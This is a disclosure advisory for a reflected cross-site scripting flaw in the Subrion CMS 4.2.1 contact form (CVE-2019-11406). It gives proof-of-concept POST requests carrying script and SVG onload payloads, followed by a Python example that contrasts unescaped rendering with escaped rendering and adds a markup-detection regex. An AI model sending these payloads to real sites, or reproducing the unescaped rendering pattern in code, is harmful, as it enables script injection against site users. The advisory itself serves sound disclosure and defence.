Description
Title: [Subrion CMS - 4.2.1 XSS]
Date: [12-04-2019]
[Vulnerability Type]
Cross Site Scripting (XSS)
Version: [4.2.1]
Tested on: [Windows, Firefox]
[Affected Product Code Base]
Subrion CMS - 4.2.1
[Affected Component]
parameter: name.
parameter: email.
parameter: phone.
In contact page.
PoC:
POST /_core/en/contacts/ HTTP/1.1
Host: demos.subrion.org
Cookie: INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2; INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2
Upgrade-Insecure-Requests: 1
__st=049b3a26a3737a49eea271c39bced75a&name=%22%3E%3Cscript%3Ealert%28test%29%3C%2Fscript%3E%22%3E&email='"--><Svg OnLoad=confirmK>&phone=&subject='"--><Svg OnLoad=confirmK>&msg=&security_code=
[Impact]
Code execution: true
[Attack Vectors]
POST /_core/en/contacts/ HTTP/1.1
Host: demos.subrion.org
Cookie: INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2; INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2
__st=049b3a26a3737a49eea271c39bced75a&name=%22%3E%3Cscript%3Ealert%28test%29%3C%2Fscript%3E%22%3E&email='"--><Svg OnLoad=confirmK>&phone=&subject='"--><Svg OnLoad=confirmK>&msg=&security_code=
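The request above shows the submitted name, email and subject values being reflected back into the contact form unescaped. The following is an added example (not Subrion's code, and not part of the advisory) that decodes the PoC body exactly as a server would, contrasts the unsafe re-render pattern with attribute-context HTML escaping, and adds a simple detection check a defender could run over decoded form parameters. The form template, the field list and the regex are assumptions for illustration; only the POST body is taken from the advisory.

```python
import re
from html import escape
from urllib.parse import parse_qs

# POST body copied from the advisory's PoC (the __st and security_code values are the page's own).
POC_BODY = (
    "__st=049b3a26a3737a49eea271c39bced75a"
    "&name=%22%3E%3Cscript%3Ealert%28test%29%3C%2Fscript%3E%22%3E"
    "&email='\"--><Svg OnLoad=confirmK>"
    "&phone="
    "&subject='\"--><Svg OnLoad=confirmK>"
    "&msg=&security_code="
)

# Assumed set of fields the contact form echoes back to the user.
FIELDS = ("name", "email", "phone", "subject")

# Assumed detector: a tag opener or an on*= event-handler attribute inside a decoded value.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|on[a-z]+\s*=", re.IGNORECASE)


def decode_form(body: str) -> dict:
    """Decode the URL-encoded body the way the server sees it (first value per key)."""
    parsed = parse_qs(body, keep_blank_values=True)
    return {k: parsed.get(k, [""])[0] for k in FIELDS}


def render_vulnerable(fields: dict) -> str:
    """The pattern behind the advisory: submitted values copied into value="..." unchanged."""
    return "".join(f'<input name="{k}" value="{v}">\n' for k, v in fields.items())


def render_hardened(fields: dict) -> str:
    """Same form, with every value escaped for the HTML attribute context (quotes included)."""
    return "".join(
        f'<input name="{k}" value="{escape(v, quote=True)}">\n' for k, v in fields.items()
    )


def breaks_attribute(html: str, raw_values) -> bool:
    """True if any submitted value reaches the page with its markup characters intact."""
    return any(v and v in html for v in raw_values)


def flag_suspicious(fields: dict) -> list:
    """Names of parameters whose decoded value contains tag or event-handler markup."""
    return [k for k, v in fields.items() if MARKUP_RE.search(v)]


if __name__ == "__main__":
    fields = decode_form(POC_BODY)
    print("flagged parameters:", flag_suspicious(fields))
    print("vulnerable render leaks markup:", breaks_attribute(render_vulnerable(fields), fields.values()))
    print("hardened render leaks markup:", breaks_attribute(render_hardened(fields), fields.values()))
```

The escaping has to match the output context: the PoC payloads open with `">` and `'"` precisely because the values land inside a quoted attribute, so `escape(..., quote=True)` (which converts both quote characters) is the minimum; a value written into a JavaScript block or a URL would need a different encoder.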
Author: [Mohammed Alorf - twitter:@_oww]
CVE-2019-11406.